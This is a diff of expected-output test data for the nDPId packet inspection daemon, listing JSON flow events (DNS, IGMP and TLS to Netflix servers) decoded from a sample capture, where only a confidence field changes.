+00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1484319035004,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1484319035004,"pkt":"gCqoTGHM5JjWH70UCABFAABT4P4AAP8RV0LAqAEHwKgBAcrtADUAP\/fHGiEBAAABAAAAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAQ=="} 
-00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1484319035024,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1484319035024,"pkt":"5JjWH70UgCqoTGHMCABFAADT4UNAAEAR1X3AqAEBwKgBBwA1yu0AvyycGiGBgAABAAgAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAcAMAAEAAQAAADoABDRZJ4vADAABAAEAAAA6AAQ0KHEVwAwAAQABAAAAOgAENrvKVcAMAAEAAQAAADoABDQnzgXADAABAAEAAAA6AAQ2lKPwwAwAAQABAAAAOgAENrujrcAMAAEAAQAAADoABDQoEorADAABAAEAAAA6AAQ0KGy7"} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319035024,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.89.39.139"}} 
+00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319035024,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.89.39.139"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035079,"flow_last_seen":1484319035079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035079,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1484319035079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035079,"pkt":"gCqoTGHM5JjWH70UCABFAABAYJ9AAEAGvIXAqAEHNFkni8+MAbsc0sO0AAAAALAC\/\/+HyQAAAgQFtAEDAwUBAQgKH2TAbQAAAAAEAgAA"} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035080,"flow_last_seen":1484319035080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035080,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -82,36 +82,36 @@ 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1484319035130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035130,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gZlAAEAGm5fAqAEHNFkni8+MAbsc0sO15elB0YAQEBUZAAAAAQEICh9kwKCtiMj8"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1484319035130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035130,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGNAk0WSeLwKgBBwG7z40HBfk7mRgRP6ASReoSOAAAAgQFtAQCCAqtiMj8H2TAbgEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1484319035132,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035132,"pkt":"gCqoTGHM5JjWH70UCABFAAA0YNFAAEAGvF\/AqAEHNFkni8+NAbuZGBE\/BwX5PIAQEBV2pwAAAQEICh9kwKGtiMj8"} 
-00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035079,"flow_last_seen":1484319035134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035134,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035080,"flow_last_seen":1484319035136,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035136,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035079,"flow_last_seen":1484319035185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035185,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035079,"flow_last_seen":1484319035186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035186,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035080,"flow_last_seen":1484319035200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035200,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035080,"flow_last_seen":1484319035215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035215,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} 
+00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035079,"flow_last_seen":1484319035134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035134,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035080,"flow_last_seen":1484319035136,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035136,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035079,"flow_last_seen":1484319035185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035185,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035079,"flow_last_seen":1484319035186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035186,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035080,"flow_last_seen":1484319035200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035200,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035080,"flow_last_seen":1484319035215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035215,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035342,"flow_last_seen":1484319035342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035342,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1484319035342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035342,"pkt":"gCqoTGHM5JjWH70UCABFAABA3CdAAEAGQP3AqAEHNFkni8+OAbvRf5R9AAAAALAC\/\/8BVgAAAgQFtAEDAwUBAQgKH2TBaAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1484319035397,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035397,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z47YAyXj0X+UfqASRepXrQAAAgQFtAQCCAqtiMk\/H2TBaAEDAwg="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1484319035399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035399,"pkt":"gCqoTGHM5JjWH70UCABFAAA0+2BAAEAGIdDAqAEHNFkni8+OAbvRf5R+2AMl5IAQEBW8GgAAAQEICh9kwZ2tiMk\/"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035342,"flow_last_seen":1484319035401,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035342,"flow_last_seen":1484319035449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319035449,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 